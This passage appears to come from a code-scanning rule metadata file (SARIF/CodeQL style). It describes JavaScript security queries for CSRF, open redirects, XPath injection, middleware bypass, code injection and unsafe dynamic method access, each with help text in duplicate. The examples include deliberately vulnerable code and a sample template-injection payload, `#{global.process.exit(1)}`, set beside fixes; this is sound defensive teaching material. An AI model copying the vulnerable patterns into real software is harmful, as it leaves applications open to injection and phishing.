of\n the data being exposed to an attacker.", + "id" : 
"js/sensitive-get-query", + "kind" : "problem", + "name" : "Sensitive data read from GET request", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.5" + } + }, { + "id" : "js/missing-token-validation", + "name" : "js/missing-token-validation", + "shortDescription" : { + "text" : "Missing CSRF middleware" + }, + "fullDescription" : { + "text" : "Using cookies without CSRF protection may allow malicious websites to submit requests on behalf of the user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Missing CSRF middleware\nWebsites that rely on cookie-based authentication may be vulnerable to cross-site request forgery (CSRF). Specifically, a state-changing request should include a secret token so the request can't be forged by an attacker. Otherwise, unwanted requests can be submitted on behalf of a user who visits a malicious website.\n\nThis is typically mitigated by embedding a session-specific secret token in each request. This token is then checked as an additional authentication measure. A malicious website should have no way of guessing the correct token to embed in the request.\n\n\n## Recommendation\nUse a middleware package such as `lusca.csrf` to protect against CSRF attacks.\n\n\n## Example\nIn the example below, the server authenticates users before performing the `changeEmail` POST action:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\");\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... update email associated with userId\n});\n\n```\nThis is not secure. 
An attacker can submit a POST `changeEmail` request on behalf of a user who visited a malicious website. Since authentication happens without any action from the user, the `changeEmail` action would be executed, despite not being initiated by the user.\n\nThis vulnerability can be mitigated by installing a CSRF protecting middleware handler:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\"),\n csrf = require('lusca').csrf;\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\napp.use(csrf());\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... update email associated with userId\n});\n\n```\n\n## References\n* OWASP: [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))\n* NPM: [lusca](https://www.npmjs.com/package/lusca)\n* Common Weakness Enumeration: [CWE-352](https://cwe.mitre.org/data/definitions/352.html).\n", + "markdown" : "# Missing CSRF middleware\nWebsites that rely on cookie-based authentication may be vulnerable to cross-site request forgery (CSRF). Specifically, a state-changing request should include a secret token so the request can't be forged by an attacker. Otherwise, unwanted requests can be submitted on behalf of a user who visits a malicious website.\n\nThis is typically mitigated by embedding a session-specific secret token in each request. This token is then checked as an additional authentication measure. 
A malicious website should have no way of guessing the correct token to embed in the request.\n\n\n## Recommendation\nUse a middleware package such as `lusca.csrf` to protect against CSRF attacks.\n\n\n## Example\nIn the example below, the server authenticates users before performing the `changeEmail` POST action:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\");\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... update email associated with userId\n});\n\n```\nThis is not secure. An attacker can submit a POST `changeEmail` request on behalf of a user who visited a malicious website. Since authentication happens without any action from the user, the `changeEmail` action would be executed, despite not being initiated by the user.\n\nThis vulnerability can be mitigated by installing a CSRF protecting middleware handler:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\"),\n csrf = require('lusca').csrf;\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\napp.use(csrf());\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... 
update email associated with userId\n});\n\n```\n\n## References\n* OWASP: [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))\n* NPM: [lusca](https://www.npmjs.com/package/lusca)\n* Common Weakness Enumeration: [CWE-352](https://cwe.mitre.org/data/definitions/352.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-352" ], + "description" : "Using cookies without CSRF protection may allow malicious websites to\n submit requests on behalf of the user.", + "id" : "js/missing-token-validation", + "kind" : "problem", + "name" : "Missing CSRF middleware", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "8.8" + } + }, { + "id" : "js/server-side-unvalidated-url-redirection", + "name" : "js/server-side-unvalidated-url-redirection", + "shortDescription" : { + "text" : "Server-side URL redirect" + }, + "fullDescription" : { + "text" : "Server-side URL redirection based on unvalidated user input may cause redirection to malicious web sites." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Server-side URL redirect\nDirectly incorporating user input into a URL redirect request without validating the input can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. 
Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\nIf this is not possible, then the user input should be validated in some other way, for example, by verifying that the target URL is on the same host as the current page.\n\n\n## Example\nThe following example shows an HTTP request parameter being used directly in a URL redirect without validating the input, which facilitates phishing attacks:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"/redirect\", function (req, res) {\n // BAD: a request parameter is incorporated without validation into a URL redirect\n res.redirect(req.query[\"target\"]);\n});\n\n```\nOne way to remedy the problem is to validate the user input against a known fixed string before doing the redirection:\n\n\n```javascript\nconst app = require(\"express\")();\n\nconst VALID_REDIRECT = \"http://cwe.mitre.org/data/definitions/601.html\";\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: the request parameter is validated against a known fixed string\n let target = req.query[\"target\"];\n if (VALID_REDIRECT === target) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nAlternatively, we can check that the target URL does not redirect to a different host by parsing it relative to a base URL with a known host and verifying that the host stays the same:\n\n\n```javascript\nconst app = require(\"express\")();\n\nfunction isLocalUrl(path) {\n try {\n return (\n // TODO: consider substituting your own domain for example.com\n new URL(path, \"https://example.com\").origin === \"https://example.com\"\n );\n } catch (e) {\n return false;\n }\n}\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: check that we don't redirect to a different host\n let target = req.query[\"target\"];\n if (isLocalUrl(target)) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nNote that as written, the above 
code will allow redirects to URLs on `example.com`, which is harmless but perhaps not intended. You can substitute your own domain (if known) for `example.com` to prevent this.\n\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n", + "markdown" : "# Server-side URL redirect\nDirectly incorporating user input into a URL redirect request without validating the input can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\nIf this is not possible, then the user input should be validated in some other way, for example, by verifying that the target URL is on the same host as the current page.\n\n\n## Example\nThe following example shows an HTTP request parameter being used directly in a URL redirect without validating the input, which facilitates phishing attacks:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"/redirect\", function (req, res) {\n // BAD: a request parameter is incorporated without validation into a URL redirect\n res.redirect(req.query[\"target\"]);\n});\n\n```\nOne way to remedy the problem is to validate the user input against a known fixed string before doing the redirection:\n\n\n```javascript\nconst app = require(\"express\")();\n\nconst VALID_REDIRECT = \"http://cwe.mitre.org/data/definitions/601.html\";\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: the request parameter is 
validated against a known fixed string\n let target = req.query[\"target\"];\n if (VALID_REDIRECT === target) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nAlternatively, we can check that the target URL does not redirect to a different host by parsing it relative to a base URL with a known host and verifying that the host stays the same:\n\n\n```javascript\nconst app = require(\"express\")();\n\nfunction isLocalUrl(path) {\n try {\n return (\n // TODO: consider substituting your own domain for example.com\n new URL(path, \"https://example.com\").origin === \"https://example.com\"\n );\n } catch (e) {\n return false;\n }\n}\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: check that we don't redirect to a different host\n let target = req.query[\"target\"];\n if (isLocalUrl(target)) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nNote that as written, the above code will allow redirects to URLs on `example.com`, which is harmless but perhaps not intended. 
You can substitute your own domain (if known) for `example.com` to prevent this.\n\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-601" ], + "description" : "Server-side URL redirection based on unvalidated user input\n may cause redirection to malicious web sites.", + "id" : "js/server-side-unvalidated-url-redirection", + "kind" : "path-problem", + "name" : "Server-side URL redirect", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/client-side-unvalidated-url-redirection", + "name" : "js/client-side-unvalidated-url-redirection", + "shortDescription" : { + "text" : "Client-side URL redirect" + }, + "fullDescription" : { + "text" : "Client-side URL redirection based on unvalidated user input may cause redirection to malicious web sites." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side URL redirect\nRedirecting to a URL that is constructed from parts of the DOM that may be controlled by an attacker can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. 
Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\n\n## Example\nThe following example uses a regular expression to extract a query parameter from the document URL, and then uses it to construct a new URL to redirect to without any further validation. This may allow an attacker to craft a link that redirects from a trusted website to some arbitrary website of their choosing, which facilitates phishing attacks:\n\n\n```javascript\nwindow.location = /.*redirect=([^&]*).*/.exec(document.location.href)[1];\n\n```\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n", + "markdown" : "# Client-side URL redirect\nRedirecting to a URL that is constructed from parts of the DOM that may be controlled by an attacker can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\n\n## Example\nThe following example uses a regular expression to extract a query parameter from the document URL, and then uses it to construct a new URL to redirect to without any further validation. 
This may allow an attacker to craft a link that redirects from a trusted website to some arbitrary website of their choosing, which facilitates phishing attacks:\n\n\n```javascript\nwindow.location = /.*redirect=([^&]*).*/.exec(document.location.href)[1];\n\n```\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116", "external/cwe/cwe-601" ], + "description" : "Client-side URL redirection based on unvalidated user input\n may cause redirection to malicious web sites.", + "id" : "js/client-side-unvalidated-url-redirection", + "kind" : "path-problem", + "name" : "Client-side URL redirect", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/xpath-injection", + "name" : "js/xpath-injection", + "shortDescription" : { + "text" : "XPath injection" + }, + "fullDescription" : { + "text" : "Building an XPath expression from user-controlled sources is vulnerable to insertion of malicious code by the user." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# XPath injection\nIf an XPath expression is built using string concatenation, and the components of the concatenation include user input, it makes it very easy for a user to create a malicious XPath expression.\n\n\n## Recommendation\nIf user input must be included in an XPath expression, either sanitize the data or use variable references to safely embed it without altering the structure of the expression.\n\n\n## Example\nIn this example, the code accepts a user name specified by the user, and uses this unvalidated and unsanitized value in an XPath expression constructed using the `xpath` package. This is vulnerable to the user providing special characters or string sequences that change the meaning of the XPath expression to search for different values.\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // BAD: Use user-provided data directly in an XPath expression\n let badXPathExpr = xpath.parse(\"//users/user[login/text()='\" + userName + \"']/home_dir/text()\");\n badXPathExpr.select({\n node: root\n });\n});\n\n```\nInstead, embed the user input using the variable replacement mechanism offered by `xpath`:\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // GOOD: Embed user-provided data using variables\n let goodXPathExpr = xpath.parse(\"//users/user[login/text()=$userName]/home_dir/text()\");\n goodXPathExpr.select({\n node: root,\n variables: { userName: userName }\n });\n});\n\n```\n\n## References\n* OWASP: [Testing for XPath 
Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection).\n* OWASP: [XPath Injection](https://www.owasp.org/index.php/XPATH_Injection).\n* npm: [xpath](https://www.npmjs.com/package/xpath).\n* Common Weakness Enumeration: [CWE-643](https://cwe.mitre.org/data/definitions/643.html).\n", + "markdown" : "# XPath injection\nIf an XPath expression is built using string concatenation, and the components of the concatenation include user input, it makes it very easy for a user to create a malicious XPath expression.\n\n\n## Recommendation\nIf user input must be included in an XPath expression, either sanitize the data or use variable references to safely embed it without altering the structure of the expression.\n\n\n## Example\nIn this example, the code accepts a user name specified by the user, and uses this unvalidated and unsanitized value in an XPath expression constructed using the `xpath` package. 
This is vulnerable to the user providing special characters or string sequences that change the meaning of the XPath expression to search for different values.\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // BAD: Use user-provided data directly in an XPath expression\n let badXPathExpr = xpath.parse(\"//users/user[login/text()='\" + userName + \"']/home_dir/text()\");\n badXPathExpr.select({\n node: root\n });\n});\n\n```\nInstead, embed the user input using the variable replacement mechanism offered by `xpath`:\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // GOOD: Embed user-provided data using variables\n let goodXPathExpr = xpath.parse(\"//users/user[login/text()=$userName]/home_dir/text()\");\n goodXPathExpr.select({\n node: root,\n variables: { userName: userName }\n });\n});\n\n```\n\n## References\n* OWASP: [Testing for XPath Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection).\n* OWASP: [XPath Injection](https://www.owasp.org/index.php/XPATH_Injection).\n* npm: [xpath](https://www.npmjs.com/package/xpath).\n* Common Weakness Enumeration: [CWE-643](https://cwe.mitre.org/data/definitions/643.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-643" ], + "description" : "Building an XPath expression from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", + "id" : "js/xpath-injection", + "kind" : "path-problem", + "name" : "XPath injection", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.8" + } + }, { + "id" : 
"js/case-sensitive-middleware-path", + "name" : "js/case-sensitive-middleware-path", + "shortDescription" : { + "text" : "Case-sensitive middleware path" + }, + "fullDescription" : { + "text" : "Middleware with case-sensitive paths do not protect endpoints with case-insensitive paths." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Case-sensitive middleware path\nUsing a case-sensitive regular expression path in a middleware route enables an attacker to bypass that middleware when accessing an endpoint with a case-insensitive path. Paths specified using a string are case-insensitive, whereas regular expressions are case-sensitive by default.\n\n\n## Recommendation\nWhen using a regular expression as a middleware path, make sure the regular expression is case-insensitive by adding the `i` flag.\n\n\n## Example\nThe following example restricts access to paths in the `/admin` path to users logged in as administrators:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\nA path such as `/admin/users/45` can only be accessed by an administrator. 
However, the path `/ADMIN/USERS/45` can be accessed by anyone because the upper-case path doesn't match the case-sensitive regular expression, whereas Express considers it to match the path string `/admin/users`.\n\nThe issue can be fixed by adding the `i` flag to the regular expression:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/i, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\n\n## References\n* MDN [Regular Expression Flags](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#advanced_searching_with_flags).\n* Common Weakness Enumeration: [CWE-178](https://cwe.mitre.org/data/definitions/178.html).\n", + "markdown" : "# Case-sensitive middleware path\nUsing a case-sensitive regular expression path in a middleware route enables an attacker to bypass that middleware when accessing an endpoint with a case-insensitive path. Paths specified using a string are case-insensitive, whereas regular expressions are case-sensitive by default.\n\n\n## Recommendation\nWhen using a regular expression as a middleware path, make sure the regular expression is case-insensitive by adding the `i` flag.\n\n\n## Example\nThe following example restricts access to paths in the `/admin` path to users logged in as administrators:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\nA path such as `/admin/users/45` can only be accessed by an administrator. 
However, the path `/ADMIN/USERS/45` can be accessed by anyone because the upper-case path doesn't match the case-sensitive regular expression, whereas Express considers it to match the path string `/admin/users`.\n\nThe issue can be fixed by adding the `i` flag to the regular expression:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/i, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\n\n## References\n* MDN [Regular Expression Flags](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#advanced_searching_with_flags).\n* Common Weakness Enumeration: [CWE-178](https://cwe.mitre.org/data/definitions/178.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-178" ], + "description" : "Middleware with case-sensitive paths do not protect endpoints with case-insensitive paths.", + "id" : "js/case-sensitive-middleware-path", + "kind" : "problem", + "name" : "Case-sensitive middleware path", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.3" + } + }, { + "id" : "js/code-injection", + "name" : "js/code-injection", + "shortDescription" : { + "text" : "Code injection" + }, + "fullDescription" : { + "text" : "Interpreting unsanitized user input as code allows a malicious user arbitrary code execution." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Code injection\nDirectly evaluating user input (for example, an HTTP request parameter) as code without properly sanitizing the input first allows an attacker arbitrary code execution. This can occur when user input is treated as JavaScript, or passed to a framework which interprets it as an expression to be evaluated. 
Examples include AngularJS expressions or JQuery selectors.\n\n\n## Recommendation\nAvoid including user input in any expression which may be dynamically evaluated. If user input must be included, use context-specific escaping before including it. It is important that the correct escaping is used for the type of evaluation that will occur.\n\n\n## Example\nThe following example shows part of the page URL being evaluated as JavaScript code. This allows an attacker to provide JavaScript within the URL. If an attacker can persuade a user to click on a link to such a URL, the attacker can evaluate arbitrary JavaScript in the browser of the user to, for example, steal cookies containing session information.\n\n\n```javascript\neval(document.location.href.substring(document.location.href.indexOf(\"default=\")+8))\n\n```\nThe following example shows a Pug template being constructed from user input, allowing attackers to run arbitrary code via a payload such as `#{global.process.exit(1)}`.\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello `+ input\n var fn = pug.compile(template);\n var html = fn();\n res.send(html);\n})\n\n```\nBelow is an example of how to use a template engine without any risk of template injection. 
The user input is included via an interpolation expression `#{username}` whose value is provided as an option to the template, instead of being part of the template string itself:\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello #{username}`\n var fn = pug.compile(template);\n var html = fn({username: input});\n res.send(html);\n})\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* PortSwigger Research Blog: [Server-Side Template Injection](https://portswigger.net/research/server-side-template-injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-95](https://cwe.mitre.org/data/definitions/95.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Code injection\nDirectly evaluating user input (for example, an HTTP request parameter) as code without properly sanitizing the input first allows an attacker arbitrary code execution. This can occur when user input is treated as JavaScript, or passed to a framework which interprets it as an expression to be evaluated. Examples include AngularJS expressions or JQuery selectors.\n\n\n## Recommendation\nAvoid including user input in any expression which may be dynamically evaluated. If user input must be included, use context-specific escaping before including it. 
It is important that the correct escaping is used for the type of evaluation that will occur.\n\n\n## Example\nThe following example shows part of the page URL being evaluated as JavaScript code. This allows an attacker to provide JavaScript within the URL. If an attacker can persuade a user to click on a link to such a URL, the attacker can evaluate arbitrary JavaScript in the browser of the user to, for example, steal cookies containing session information.\n\n\n```javascript\neval(document.location.href.substring(document.location.href.indexOf(\"default=\")+8))\n\n```\nThe following example shows a Pug template being constructed from user input, allowing attackers to run arbitrary code via a payload such as `#{global.process.exit(1)}`.\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello `+ input\n var fn = pug.compile(template);\n var html = fn();\n res.send(html);\n})\n\n```\nBelow is an example of how to use a template engine without any risk of template injection. 
The user input is included via an interpolation expression `#{username}` whose value is provided as an option to the template, instead of being part of the template string itself:\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello #{username}`\n var fn = pug.compile(template);\n var html = fn({username: input});\n res.send(html);\n})\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* PortSwigger Research Blog: [Server-Side Template Injection](https://portswigger.net/research/server-side-template-injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-95](https://cwe.mitre.org/data/definitions/95.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-094", "external/cwe/cwe-095", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Interpreting unsanitized user input as code allows a malicious user arbitrary\n code execution.", + "id" : "js/code-injection", + "kind" : "path-problem", + "name" : "Code injection", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.3" + } + }, { + "id" : "js/unsafe-dynamic-method-access", + "name" : "js/unsafe-dynamic-method-access", + "shortDescription" : { + "text" : "Unsafe dynamic method access" + }, + "fullDescription" : { + "text" : "Invoking user-controlled 
methods on certain objects can lead to remote code execution." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Unsafe dynamic method access\nCalling a user-controlled method on certain objects can lead to invocation of unsafe functions, such as `eval` or the `Function` constructor. In particular, the global object contains the `eval` function, and any function object contains the `Function` constructor in its `constructor` property.\n\n\n## Recommendation\nAvoid invoking user-controlled methods on the global object or on any function object. Whitelist the permitted method names or change the type of object the methods are stored on.\n\n\n## Example\nIn the following example, a message from the document's parent frame can invoke the `play` or `pause` method. However, it can also invoke `eval`. A malicious website could embed the page in an iframe and execute arbitrary code by sending a message with the name `eval`.\n\n\n```javascript\n// API methods\nfunction play(data) {\n // ...\n}\nfunction pause(data) {\n // ...\n}\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function \n window[message.name](message.payload);\n});\n\n```\nInstead of storing the API methods in the global scope, put them in an API object or Map. 
It is also good practice to prevent invocation of inherited methods like `toString` and `valueOf`.\n\n\n```javascript\n// API methods\nlet api = {\n play: function(data) {\n // ...\n },\n pause: function(data) {\n // ...\n }\n};\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function\n if (!api.hasOwnProperty(message.name)) {\n return;\n }\n api[message.name](message.payload);\n});\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* MDN: [Global functions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects#Function_properties).\n* MDN: [Function constructor](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n", + "markdown" : "# Unsafe dynamic method access\nCalling a user-controlled method on certain objects can lead to invocation of unsafe functions, such as `eval` or the `Function` constructor. In particular, the global object contains the `eval` function, and any function object contains the `Function` constructor in its `constructor` property.\n\n\n## Recommendation\nAvoid invoking user-controlled methods on the global object or on any function object. Whitelist the permitted method names or change the type of object the methods are stored on.\n\n\n## Example\nIn the following example, a message from the document's parent frame can invoke the `play` or `pause` method. However, it can also invoke `eval`. 
A malicious website could embed the page in an iframe and execute arbitrary code by sending a message with the name `eval`.\n\n\n```javascript\n// API methods\nfunction play(data) {\n // ...\n}\nfunction pause(data) {\n // ...\n}\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function \n window[message.name](message.payload);\n});\n\n```\nInstead of storing the API methods in the global scope, put them in an API object or Map. It is also good practice to prevent invocation of inherited methods like `toString` and `valueOf`.\n\n\n```javascript\n// API methods\nlet api = {\n play: function(data) {\n // ...\n },\n pause: function(data) {\n // ...\n }\n};\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function\n if (!api.hasOwnProperty(message.name)) {\n return;\n }\n api[message.name](message.payload);\n});\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* MDN: [Global functions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects#Function_properties).\n* MDN: [Function 